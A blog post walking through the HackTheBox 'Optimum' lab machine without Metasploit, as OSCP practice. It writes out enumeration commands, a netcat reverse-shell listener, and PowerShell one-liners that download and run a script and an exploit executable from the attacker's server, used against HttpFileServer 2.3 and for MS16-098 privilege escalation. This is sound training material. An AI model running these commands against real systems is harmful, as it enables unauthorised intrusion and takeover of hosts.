DEV Community

Cover image for Writeup: HackTheBox Optimum- Without Metasploit (OSCP Prep)
Chris
Chris

Posted on

Writeup: HackTheBox Optimum- Without Metasploit (OSCP Prep)

Hello All!

Back again with another write up this time for Optimum from Hackthebox.

Difficulty level: Easy

As with all things I will start with a simple Nmap Scan

Alt Text

Command:

Nmap -sC -sV -sT -T4 -O nmap.txt 10.10.10.8

So not a ton of information is gathered here. But I do see a port 80 is open.

Let's head over to the site to see what we can find here.

Alt Text

So I inspected the page for awhile but didn't see anything too crazy here. Take note of the Server Information at the bottom HttpFileServer 2.3.

I am going to run Dirb to see if there are any hidden directories with this site.

Command:

dirb http://10.10.10.8/

Alt Text

This runs for quite awhile but nothing seems to catch. So lets move on.

There appears to be a login section on the website so I am going to try admin:admin

Alt Text

That was a fail. I tried some other variations too that didn't appear to work on the box and it kicked me off.

Let's turn to our trusted friend Google for some default creds maybe?

Alt Text

It looks like you have to register to the Server to get access so no luck again.

Lets take a deeper look into what this system is.

Alt Text

Basically its a File Server to send/receive files.

Heading back over to Google I am going to see if there are any exploits for this version and come across the following.

Alt Text

Take a closer look here, because this is how we will run the exploit.

So to put it simple, we need to run a HTTP Server from where our NC.exe is located (or make a copy in the same folder).

Alt Text

Copy this code either by using the copy button or highlighting it then paste it in your new file.

Command:

echo > exploit.py (since they named Exploit.py on their site want to keep the same convention)

Alt Text

Command:

nano exploit.py

Now paste in the code into the new .py file and edit the IP and Port number to yours.

Alt Text

Command:

chmod +x exploit.py

Alt Text

Now open a new terminal and do the following.

Command:

locate nc.exe

Alt Text

Command:

cp file/location .

Alt Text

Now we will start a python webserver.

Command:

python -m SimpleHTTPServer

Alt Text

Now set your Netcat listener to whatever port you have open. I also directed the IP here because it didn't work without it for some reason.

Command:

nc -nvlp 1234 10.10.10.8

Alt Text

In the window where your exploit is sitting run the following command.

Command:

python exploit.py 10.10.10.8 80

Alt Text

You may need to run this a few times to catch a shell.

But you should get the following!

Alt Text

Command:

whoami

Alt Text

There are a few file locations and I attempt to get access to Administrator but it looks like I don't have rights.

Alt Text

Let's see if we can grab the user file.

Command:

type user.txt.txt

Alt Text

So it looks like we need to do a privesc on this box to get the root flag.

Run the following to get a full readout of the box.

Command:

systeminfo

Alt Text

Provides the OS name, Version, Manufac, Config as well as the got Fixies for the machine.

A hotfix or a quick-fix is a update to a bug or fault quickly.

Alt Text

Alt Text

I started with Windows-exploit-suggestor.py but I couldn't get it to run. There seems to be some issues with py2 and migrating over to py3.

If you get this working with a workaround please ping me on twitter and tell me how you fixed it.

Another tool for looking for privesc is Sherlock.

Command:

git clone https://github.com/rasta-mouse/Sherlock.git

Alt Text

Command:

cd Sherlock
Nano Sherlock.ps1

Alt Text

Now put the following command at the bottom of the script.

Command:

Find All-Vulns

Alt Text

Now we need to get this script onto our victim machine. Lets open back up the Python webserver to push it over.

Command:

python -m SimpleHTTPServer 80

Alt Text

I cheated a little by checking out this quick Powershell cheatsheet on how to move this file over.

Link

Command:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://X.X.X.X:80/Sherlock.ps1')"

Alt Text

Now this should run to show a few potential MS's that we can use.

Alt Text

From the list I am going to give MS16-032 a try and do a quick searchsploit to see if its there.

Command:

searchsploit MS16-032

Alt Text

Going to try the 39719.ps1 one.

Command:

nano 39719.ps1

Alt Text

Alt Text

When put in the next powershell script make sure to direct it to a actual file.

Alt Text

I tried to run this a few times but it didn't work.

So I am going to head back over to Google for another way in. I came across MS16-098 that I would like to try.

Alt Text

Let's grab this .exe file.

Command:

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Alt Text

Command

chmod +x 41020.exe

Alt Text

Command:

python -m SimpleHTTPServer 80

Alt Text

Run the following code in your victim machine.

Command:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.X.X:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Alt Text

Command:

whoami

Alt Text

Command:

type root.txt

Alt Text

And just like that you have now gained root level access!

Alt Text

Top comments (0)